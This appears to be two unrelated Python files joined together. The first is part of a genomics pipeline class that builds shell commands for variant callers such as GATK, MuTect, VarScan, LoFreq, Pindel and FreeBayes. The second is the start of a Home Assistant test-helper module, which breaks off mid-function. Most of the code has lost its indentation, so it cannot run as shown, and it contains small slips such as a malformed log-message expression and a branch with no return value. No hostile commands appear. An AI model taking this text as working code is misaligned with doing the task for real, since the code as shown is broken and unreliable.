cmd = "%s -Xmx%s -Djava.io.tmpdir=%s \
-jar %s -R %s \
-T HaplotypeCaller \
%s \
-I %s -o %s"\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option_rna, self.path, out_vcf.path)
if snp_flag and intervals_flag :
cmd = cmd + " --dbsnp %s --intervals %s" %(dbsnp,intervals)
elif snp_flag and not intervals_flag:
cmd = cmd + " --dbsnp %s" %(dbsnp)
elif not snp_flag and intervals_flag:
cmd = cmd + " --intervals %s" %(intervals)
log = " &> %s/log/%s.case.Haplotypecaller.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if self.isexist():
if not out_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_vcf.isexist():
return(False)
else:
savecmd(cmd , self.samplename)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct haplotype_caller step!")
return(False)
def unifiedgenotyper_caller(self, out_dir, control_bam = ""):
"""
Ret:Use GATK UnifiedGenotyper to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
intervals = config_dict["intervals"]
thread = config_dict["bamfile_unifiedgenotyper_caller_thread"]
extra_option = config_dict["bamfile_unifiedgenotyper_caller_extra"]
tmp_dir = config_dict["gatk_tmp_dir"]
java_max_mem = config_dict["java_max_mem"]
create_dir(out_dir)
def setcmd(bamfile, out_vcf, backrun=False):
cmd = "%s -Xmx%s -Djava.io.tmpdir=%s -jar %s -R %s %s -nt %s \
-T UnifiedGenotyper \
-I %s -o %s "\
% (java, java_max_mem, tmp_dir, gatk, reffa, extra_option, thread, bamfile, out_vcf)
if snp_flag and intervals_flag :
cmd = cmd + " --dbsnp %s --intervals %s" %(dbsnp,intervals)
elif snp_flag and not intervals_flag:
cmd = cmd + " --dbsnp %s" %(dbsnp)
elif not snp_flag and intervals_flag:
cmd = cmd + " --intervals %s" %(intervals)
if backrun:
cmd = cmd + " &"
return(cmd)
snp_flag = dbsnp != ""
intervals_flag = intervals != ""
out_vcf = out_dir + "/" + self.samplename + ".vcf"
out_vcf = VcfFile(out_vcf, self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
info("Running Unifiedgenotyper_caller step for " + self.path + " and " + control_bam)
out_case_vcf = VcfFile(out_vcf.path + ".case", self.samplename, config_dict)
out_control_vcf = VcfFile(out_vcf.path + ".control" ,self.samplename, config_dict)
case_cmd = setcmd(self.path, out_case_vcf.path)
log = " &> %s/log/%s.case.Unifiedgenotyper_caller.log" % (os.getcwd(), self.runid)
case_cmd = case_cmd + log
control_cmd = setcmd(control_bam, out_control_vcf.path)
log = " &> %s/log/%s.control.Unifiedgenotyper_caller.log" % (os.getcwd(), self.runid)
control_cmd = control_cmd + log
if self.isexist() and isexist(control_bam):
if not out_vcf.isexist():
threads = []
if not out_case_vcf.isexist():
def func(cmd = case_cmd):
runcmd(cmd)
t1 = threading.Thread(target = func)
threads.append(t1)
savecmd(case_cmd, self.samplename)
if not out_control_vcf.isexist():
def func(cmd = control_cmd):
runcmd(cmd)
t2 = threading.Thread(target = func)
threads.append(t2)
savecmd(control_cmd, self.samplename)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
if not out_case_vcf.isexist() or not out_control_vcf.isexist():
return(False)
out_case_vcf.control_filter(out_control_vcf.path, out_vcf.path)
if not out_vcf.isexist():
return(False)
else:
savecmd(case_cmd, self.samplename)
savecmd(control_cmd, self.samplename)
out_case_vcf.control_filter(out_control_vcf.path, out_vcf.path)
if not out_vcf.isexist():
return(False)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct unifiedgenotyper_caller step!")
return(False)
else:
info("Running Unifiedgenotyper_caller step for " + self.path)
cmd = setcmd(self.path, out_vcf.path)
log = " &> %s/log/%s.case.Unifiedgenotyper_caller.log" % (os.getcwd(), self.runid)
cmd = cmd + log
if self.isexist():
if not out_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_vcf.isexist():
return(False)
else:
savecmd(cmd, self.samplename)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct unifiedgenotyper_caller step!")
return(False)
def mutect_caller(self, control_bam ,out_dir):
"""
Ret:Use GATK Mutect to conduct Variant Discovery Step.
"""
config_dict = copy.deepcopy(self.config_dict)
config_dict = set_jdk(config_dict, "jdk_17")
java = config_dict["java"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
cosmic = config_dict["cosmic"]
intervals = config_dict["intervals"]
tmp_dir = config_dict["gatk_tmp_dir"]
mutect = config_dict["mutect"]
extra_option = config_dict["bamfile_mutect_caller_extra"]
create_dir(out_dir)
info("Running Mutect step for " + self.path and control_bam)
snp_flag = dbsnp != ""
intervals_flag = intervals != ""
out_vcf = out_dir + "/" + self.samplename + ".vcf"
tmp = out_vcf + ".tmp"
out_vcf = VcfFile(out_vcf,self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if isexist(tmp) and not out_vcf.isexist():
runcmd("grep -v \'REJECT\' %s > %s" % (tmp, out_vcf.path))
cmd = "%s -jar %s -T MuTect -R %s -I:tumor %s -I:normal %s \
--cosmic %s \
%s \
-o %s "\
% (java, mutect, reffa, self.path, control_bam, cosmic, extra_option, tmp)
if self.isexist():
if not out_vcf.isexist() and not isexist(tmp):
if snp_flag and intervals_flag :
cmd = cmd + " --dbsnp %s --intervals %s" %(dbsnp,intervals)
elif snp_flag and not intervals_flag:
cmd = cmd + " --dbsnp %s" %(dbsnp)
elif not snp_flag and intervals_flag:
cmd = cmd + " --intervals %s" %(intervals)
log = " &> %s/log/%s.case.Mutect_caller.log" % (os.getcwd(), self.runid)
cmd = cmd + log
cmd = cmd + " && grep -v \'REJECT\' %s > %s" % (tmp, out_vcf.path)
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_vcf.isexist():
return(False)
else:
savecmd(cmd, self.samplename)
config_dict = set_jdk(config_dict, "jdk_18")
return(out_vcf) # VcfFile Class instance
else:
config_dict = set_jdk(config_dict, "jdk_18")
info("Bam File not exists, can not conduct mutect_caller step!")
return(False)
def varscan_caller(self, out_dir="", control_bam = ""):
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
varscan = config_dict["varscan"]
samtools = config_dict["samtools"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
java_max_mem = config_dict["java_max_mem"]
extra_option_somatic = config_dict["bamfile_varscan_caller_extra_somatic"]
extra_option_germline = config_dict["bamfile_varscan_caller_extra_germline"]
create_dir(out_dir)
info("Running Varscan_caller step for " + self.path)
out_snp_vcf = out_dir + "/" + self.samplename + ".snp.vcf"
out_snp_vcf = VcfFile(out_snp_vcf, self.samplename, config_dict, runid = self.runid + ".Varscan")
out_indel_vcf = out_dir + "/" + self.samplename + ".indel.vcf"
out_indel_vcf = VcfFile(out_indel_vcf, self.samplename, config_dict, runid = self.runid + ".Varscan")
out_vcf = out_dir + "/" + self.samplename + ".vcf"
out_vcf = VcfFile(out_vcf, self.samplename, config_dict)
case_bam = BamFile(self.path, self.samplename, config_dict)
control_bam = BamFile(control_bam, self.samplename, config_dict)
cmd = ""
if self.isexist():
if not out_vcf.isexist() and (not out_snp_vcf.isexist() or not out_indel_vcf.isexist()):
case_mpileup_fn = MpileupFile(out_dir + "/" + self.samplename + ".mpileup.case", self.samplename, config_dict)
control_mpileup_fn = MpileupFile(out_dir + "/" + self.samplename + ".mpileup.control", self.samplename, config_dict)
threads = []
if control_bam.path != "" and control_bam.isexist():
def func(case_bam = case_bam, case_mpileup_fn = case_mpileup_fn):
case_bam.mpileup(case_mpileup_fn.path)
t1 = threading.Thread(target = func)
def func(control_bam = control_bam, control_mpileup_fn = control_mpileup_fn):
control_bam.mpileup(control_mpileup_fn.path)
t2 = threading.Thread(target = func)
threads.append(t1)
threads.append(t2)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
cmd = "%s -Xmx%s -jar %s somatic %s %s --output-snp %s --output-indel %s --output-vcf %s"\
%(java, java_max_mem, varscan, case_mpileup_fn.path, control_mpileup_fn.path, out_snp_vcf.path, out_indel_vcf.path, extra_option_somatic)
log = " &> %s/log/%s.case.Varscan_caller.log" % (os.getcwd(), self.runid)
cmd = cmd + log
runcmd(cmd)
savecmd(cmd, self.samplename)
else:
case_bam.mpileup(case_mpileup_fn.path)
snpcmd = "%s -Xmx%s -jar %s mpileup2snp %s --output-vcf 1 %s > %s"\
%(java, java_max_mem, varscan, case_mpileup_fn.path, extra_option_germline, out_snp_vcf.path)
indelcmd = "%s -Xmx%s -jar %s mpileup2indel %s --output-vcf 1 %s > %s"\
%(java, java_max_mem, varscan, case_mpileup_fn.path, extra_option_germline, out_indel_vcf.path)
snpcmd = snpcmd + " 2> %s/log/%s.case.Varscan_caller_snp.log" % (os.getcwd(), self.runid)
indelcmd = indelcmd + " 2> %s/log/%s.case.Varscan_caller_indel.log" % (os.getcwd(), self.runid)
                    t1 = threading.Thread(target = runcmd, args = (snpcmd,))
                    t2 = threading.Thread(target = runcmd, args = (indelcmd,))
threads.append(t1)
threads.append(t2)
savecmd(snpcmd, self.samplename)
savecmd(indelcmd, self.samplename)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
if not out_snp_vcf.isexist() or not out_indel_vcf.isexist():
return(False)
else:
out_snp_vcf.varscan2gatkfmt()
out_indel_vcf.varscan2gatkfmt()
out_snp_vcf.merge(out_vcf.path, indel=out_indel_vcf.path)
else:
savecmd(cmd, self.samplename)
out_snp_vcf.varscan2gatkfmt()
out_indel_vcf.varscan2gatkfmt()
out_snp_vcf.merge(out_vcf.path, indel=out_indel_vcf.path)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct varscan_caller step!")
return(False)
def torrent_caller(self, out_dir, control_bam=""):
"""
Ret:Use TVC-5.0.3 to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
tvc = config_dict["tvc"]
reffa = config_dict["reffa"]
dbsnp = config_dict["dbsnp"]
intervals = config_dict["intervals"]
tmp_dir = config_dict["tvc_tmp_dir"]
thread = config_dict["bamfile_torrent_caller_thread"]
extra_option = config_dict["bamfile_torrent_caller_extra"]
json = config_dict["tvc_params_json"]
create_dir(out_dir)
runed_vcf = out_dir + "/" + self.samplename + ".vcf"
        runed_vcf = VcfFile(runed_vcf, self.samplename, config_dict)
def setcmd(bamfile, reffa, out_dir, json ="", backrun=False):
cmd = "%s -i %s -r %s -o %s %s " \
% (tvc, bamfile, reffa, out_dir, extra_option)
if json != "":
cmd = cmd + " -p %s" %(json)
if backrun:
cmd = cmd + " &"
return(cmd)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
info("Running TorrentVariantCaller step for " + self.path + " and " + control_bam)
out_case_vcf = VcfFile(out_dir + "/case/TSVC_variants.vcf", self.samplename, config_dict)
out_control_vcf = VcfFile(out_dir + "/control/TSVC_variants.vcf" ,self.samplename, config_dict)
case_cmd = setcmd(self.path, reffa, out_case_vcf.dirname, json)
case_cmd = case_cmd + " &> %s/log/%s.case.torrent_caller.log" % (os.getcwd(), self.runid)
control_cmd = setcmd(control_bam, reffa, out_control_vcf.dirname, json)
control_cmd = control_cmd + " &> %s/log/%s.control.torrent_caller.log" % (os.getcwd(), self.runid)
if self.isexist() and isexist(control_bam):
if not runed_vcf.isexist():
if not out_case_vcf.isexist():
runcmd(case_cmd)
savecmd(case_cmd, self.samplename)
if not out_control_vcf.isexist():
runcmd(control_cmd)
savecmd(control_cmd, self.samplename)
if not out_case_vcf.isexist() or not out_control_vcf.isexist():
return(False)
out_case_vcf.control_filter(out_control_vcf.path, runed_vcf.path)
if not runed_vcf.isexist():
return(False)
else:
savecmd(case_cmd, self.samplename)
savecmd(control_cmd, self.samplename)
out_case_vcf.control_filter(out_control_vcf.path, runed_vcf.path)
if not runed_vcf.isexist():
return(False)
return(runed_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct TorrentVariantCaller step!")
return(False)
else:
info("Running TorrentVariantCaller step for " + self.path)
out_vcf= out_dir + "/TSVC_variants.vcf"
out_vcf = VcfFile(out_vcf, self.samplename, config_dict)
cmd = setcmd(self.path, reffa, out_dir, json)
if out_vcf.isexist():
out_vcf.mv(runed_vcf.path)
if self.isexist():
if not runed_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
if out_vcf.isexist():
if not out_vcf.mv(runed_vcf.path):
return(False)
else:
return(False)
else:
savecmd(cmd, self.samplename)
return(runed_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct TorrentVariantCaller step!")
return(False)
def lofreq_caller(self, out_dir, control_bam = ""):
"""
Ret:Use lofreq to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
java = config_dict["java"]
gatk = config_dict["gatk"]
lofreq = config_dict["lofreq"]
reffa = config_dict["reffa"]
dbsnp = config_dict["lofreq_dbsnp"]
intervals = config_dict["intervals"]
thread = config_dict["bamfile_lofreq_caller_thread"]
extra_option_germline = config_dict["bamfile_lofreq_caller_extra_germline"]
extra_option_somatic = config_dict["bamfile_lofreq_caller_extra_somatic"]
create_dir(out_dir)
info("Running Lofreq_caller step for " + self.path)
out_fn = out_dir + "/" + self.samplename + "_"
out_snp_vcf = out_dir + "/" + self.samplename + "_somatic_final.snvs.vcf"
out_indel_vcf = out_dir + "/" + self.samplename + "_somatic_final.indels.vcf"
runed_vcf = out_dir + "/" + self.samplename + ".vcf"
runed_vcf = VcfFile(runed_vcf,self.samplename, config_dict)
out_snp_vcf = VcfFile(out_snp_vcf, self.samplename, config_dict, runid = self.runid + ".Lofreq")
out_indel_vcf = VcfFile(out_indel_vcf, self.samplename, config_dict, runid = self.runid + ".Lofreq")
out_snp_vcfgz = FundementalFile(out_snp_vcf.path + ".gz")
out_indel_vcfgz = FundementalFile(out_indel_vcf.path + ".gz")
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
cmd = "%s somatic -n %s -t %s -f %s -d %s --threads %s --call-indels -o %s %s " \
% (lofreq, control_bam, self.path, reffa, dbsnp, thread, out_fn, extra_option_somatic)
if intervals != "" and isexist(intervals):
cmd = cmd + " -l %s"%(intervals)
else:
cmd = "%s call-parallel --pp-threads %s -f %s --call-indels -o %s %s " %(lofreq, thread, reffa, runed_vcf, extra_option_germline)
if intervals != "" and isexist(intervals):
cmd = cmd + " -l %s %s"%(intervals, self.path)
else:
cmd = cmd + self.path
cmd = cmd + " &> %s/log/%s.case.lofreq_caller.log" % (os.getcwd(), self.runid)
if self.isexist():
if control_bam == "" or (not isexist(control_bam)):
runcmd(cmd)
savecmd(cmd, self.samplename)
else:
if out_snp_vcfgz.isexist() and not out_snp_vcf.isexist():
out_snp_vcfgz.gzip_uncompress()
if out_indel_vcfgz.isexist() and not out_indel_vcf.isexist():
out_indel_vcfgz.gzip_uncompress()
if not runed_vcf.isexist() and out_snp_vcf.isexist() and out_indel_vcf.isexist():
out_snp_vcf.merge(runed_vcf, indelvcf = out_indel_vcf.path)
if not runed_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
out_snp_vcfgz.gzip_uncompress()
out_indel_vcfgz.gzip_uncompress()
out_snp_vcf.merge(runed_vcf, indelvcf = out_indel_vcf.path)
if runed_vcf.isexist():
return(runed_vcf)
else:
return(False)
else:
info("Bam File not exists, can not conduct lofreq_caller step!")
return(False)
def pindel_caller(self, out_dir, control_bam=""):
"""
Ret:Use Pindel to conduct SVs Discovery Step.
"""
config_dict = self.config_dict
reffa = config_dict["reffa"]
pindel_dir = config_dict["pindel_dir"]
thread = config_dict["bamfile_pindel_caller_thread"]
genome_name = config_dict["bamfile_pindel_genome_name"]
genome_date = config_dict["bamfile_pindel_genome_date"]
insertsize = config_dict["bamfile_pindel_insertsize"]
create_dir(out_dir)
pindel = pindel_dir + "/pindel"
pindel2vcf4tcga = pindel_dir + "/pindel2vcf4tcga"
def __pindelout2vcf(datadir, prefix, out_vcf):
out_type_list = ["_D","_BP","_SI","_INV","_TD","_LI","_BP"]
out_fnlist = [ prefix + i for i in out_type_list]
fn = FundementalFile("/dev/null")
if not isexist(out_vcf + ".pindelout"):
fn.catmerge(out_fnlist, out_vcf + ".pindelout")
cmd = "%s -p %s -r %s -R %s -d %s -v %s -G -so true" \
%(pindel2vcf4tcga, out_vcf + ".pindelout", reffa, genome_name, genome_date, out_vcf)
if not isexist(out_vcf):
runcmd(cmd)
savecmd(cmd, self.samplename)
info("Running Pindel step for " + self.path)
runed_vcf = VcfFile(out_dir + "/" + self.samplename + ".vcf", self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
config_case = out_dir + "/pindel.case.config"
config_casefn = open(config_case,"w")
config_casefn.write(self.path + "\t" + insertsize + "\t" + self.samplename + "\n")
config_casefn.flush()
out_case = out_dir + "/" + self.samplename + ".case"
config_control = out_dir + "/pindel.control.config"
config_controlfn = open(config_control,"w")
config_controlfn.write(control_bam + "\t" + insertsize + "\t" + self.samplename + "\n")
config_controlfn.flush()
out_control = out_dir + "/" + self.samplename + ".control"
if self.isexist():
case_cmd = "%s -f %s -i %s -c ALL --number_of_threads %s -o %s" %(pindel, reffa, config_case, thread, out_case)
case_cmd = case_cmd + " &> %s/log/%s.case.pindel_caller.log" % (os.getcwd(), self.runid)
control_cmd = "%s -f %s -i %s -c ALL --number_of_threads %s -o %s" %(pindel, reffa, config_control, thread, out_control)
control_cmd = control_cmd + " &> %s/log/%s.control.pindel_caller.log" % (os.getcwd(), self.runid)
else:
out_case = out_dir + "/" + self.samplename + ".case"
case_cmd = "%s -f %s -i %s -c ALL --number_of_threads %s -o %s" %(pindel, reffa, config_case, thread, out_case)
case_cmd = case_cmd + " &> %s/log/%s.case.pindel_caller.log" % (os.getcwd(), self.runid)
if self.isexist():
if control_bam != "" and isexist(control_bam):
if not isexist(out_case + "_D"):
runcmd(case_cmd)
savecmd(case_cmd, self.samplename)
if not isexist(out_control + "_D"):
runcmd(control_cmd)
savecmd(control_cmd, self.samplename)
out_case_vcf = VcfFile(out_case + ".vcf", self.samplename, config_dict)
out_control_vcf = VcfFile(out_control + ".vcf", self.samplename, config_dict)
__pindelout2vcf(out_dir, out_case, out_case_vcf.path)
__pindelout2vcf(out_dir, out_control, out_control_vcf.path)
out_case_vcf.control_filter(out_control_vcf.path, runed_vcf.path)
else:
if not isexist(out_case + "_D"):
runcmd(case_cmd)
savecmd(case_cmd, self.samplename)
out_case_vcf = VcfFile(out_case + ".vcf", self.samplename, config_dict)
__pindelout2vcf(out_dir, out_case, out_case_vcf.path)
out_case_vcf.mv(runed_vcf.path)
            if runed_vcf.isexist():
                return(runed_vcf)
            else:
                info("Pindel VariantCaller run failed!")
                return(False)
else:
info("Bam File not exists, can not conduct Pindel step!")
return(False)
def freebayes_caller(self, out_dir, control_bam=""):
"""
Ret:Use Freebayes to conduct Variant Discovery Step.
"""
config_dict = self.config_dict
java = config_dict["java"]
freebayes = config_dict["freebayes"]
reffa = config_dict["reffa"]
intervals = config_dict["intervals"]
extra_option = config_dict["bamfile_freebayes_caller_extra"]
create_dir(out_dir)
def setcmd(bamfile, out_vcf, backrun=False):
cmd = "%s -f %s %s" \
% (freebayes, reffa, extra_option)
if intervals_flag:
cmd = cmd + " -t %s" %(intervals)
            cmd = cmd + " " + bamfile + " > " + out_vcf
            if backrun:
                cmd = cmd + " &"
return(cmd)
intervals_flag = intervals != ""
out_vcf = out_dir + "/" + self.samplename + ".vcf"
out_vcf = VcfFile(out_vcf, self.samplename, config_dict)
if isinstance(control_bam, BamFile):
control_bam = control_bam.path
if control_bam != "" and isexist(control_bam):
info("Running frebayes_caller step for " + self.path + " and " + control_bam)
out_case_vcf = VcfFile(out_vcf.path + ".case", self.samplename, config_dict)
out_control_vcf = VcfFile(out_vcf.path + ".control" ,self.samplename, config_dict)
case_cmd = setcmd(self.path, out_case_vcf.path)
control_cmd = setcmd(control_bam, out_control_vcf.path)
if self.isexist() and isexist(control_bam):
if not out_vcf.isexist():
threads = []
if not out_case_vcf.isexist():
def func(cmd = case_cmd):
runcmd(cmd)
t1 = threading.Thread(target = func)
threads.append(t1)
savecmd(case_cmd, self.samplename)
if not out_control_vcf.isexist():
def func(cmd = control_cmd):
runcmd(cmd)
t2 = threading.Thread(target = func)
threads.append(t2)
savecmd(control_cmd, self.samplename)
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
if not out_case_vcf.isexist() or not out_control_vcf.isexist():
return(False)
out_case_vcf.control_filter(out_control_vcf.path, out_vcf.path)
if not out_vcf.isexist():
return(False)
else:
savecmd(case_cmd, self.samplename)
savecmd(control_cmd, self.samplename)
out_case_vcf.control_filter(out_control_vcf.path, out_vcf.path)
if not out_vcf.isexist():
return(False)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct unifiedgenotyper_caller step!")
return(False)
else:
info("Running freebayes_caller step for " + self.path)
cmd = setcmd(self.path, out_vcf.path)
if self.isexist():
if not out_vcf.isexist():
runcmd(cmd)
savecmd(cmd, self.samplename)
if not out_vcf.isexist():
return(False)
else:
savecmd(cmd, self.samplename)
return(out_vcf) # VcfFile Class instance
else:
info("Bam File not exists, can not conduct freebayes_caller step!")
def __str__(self):
return(self.path)
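# ---------------------------------------------------------------------------
# Usage sketch (illustrative only, not part of the pipeline): how the BamFile
# methods above are typically chained for a DNA-seq run. The config_dict
# contents, file paths and sample name are hypothetical placeholders.
#
#   bam = BamFile("/data/A101A.bam", "A101A", config_dict)
#   bam.index()
#   sorted_bam = bam.sort("/data/A101A.sorted.bam")
#   if sorted_bam:
#       dedup_bam = sorted_bam.mark_duplicates("/data/A101A.dedup.bam",
#                                              "/data/A101A.dedup.metrics")
#       if dedup_bam:
#           vcf = dedup_bam.haplotype_caller("/data/calls", seq_type="dna")
# ---------------------------------------------------------------------------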
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from collections import OrderedDict
from datetime import timedelta
import functools as ft
import json
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import auth, core as ha, config_entries
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers)
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform, storage, device_registry)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[entity_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
def mock_device_registry(hass, mock_entries=None):
